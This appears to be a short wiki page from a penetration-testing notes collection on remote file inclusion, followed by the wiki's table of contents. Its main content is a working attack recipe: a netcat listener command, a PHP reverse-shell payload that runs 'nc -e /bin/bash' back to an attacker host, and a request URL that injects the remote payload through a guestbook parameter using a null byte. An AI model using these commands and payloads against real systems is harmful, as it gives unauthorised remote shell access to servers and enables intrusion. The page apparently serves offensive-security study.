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lethanhtung01011980 edited this page Dec 30, 2019 · 5 revisions


  • Execute evil code from remote file

In attacker PC

  • Listen at port 4444: nc -nlvp 4444
  • To create evil code to contain to-be-executed-code. It should be a reverse shell code, btw: <?php echo shell_exec("nc -nv attacker-ip 4444 -e /bin/bash");?>
  • To execute remote code http://victim_ip/addguestbook.php?name=a&comment=b&LANG=http://attacker_ip/evil.txt%00


0. COMMON exploits

1. Scan Info

1.2 Passive Gathering

1.3 Active Gathering

2. Pre-attack

2.2 File transfer

3. Get Reverse Shell

4. Exploits

4.2 Windows Exploits

4.3 Linux Exploits

4.4 Password crack

4.5 Buffer Overflow

4.6 Web attacks

6. Escalate Privilege

6.1 Escalate in Windows

6.2 Escalate in Linux

7. Access and further attacks

8. Port redirection and Tunnelling

9. Metasploit

10. Kali

11. Thirdparty scripts

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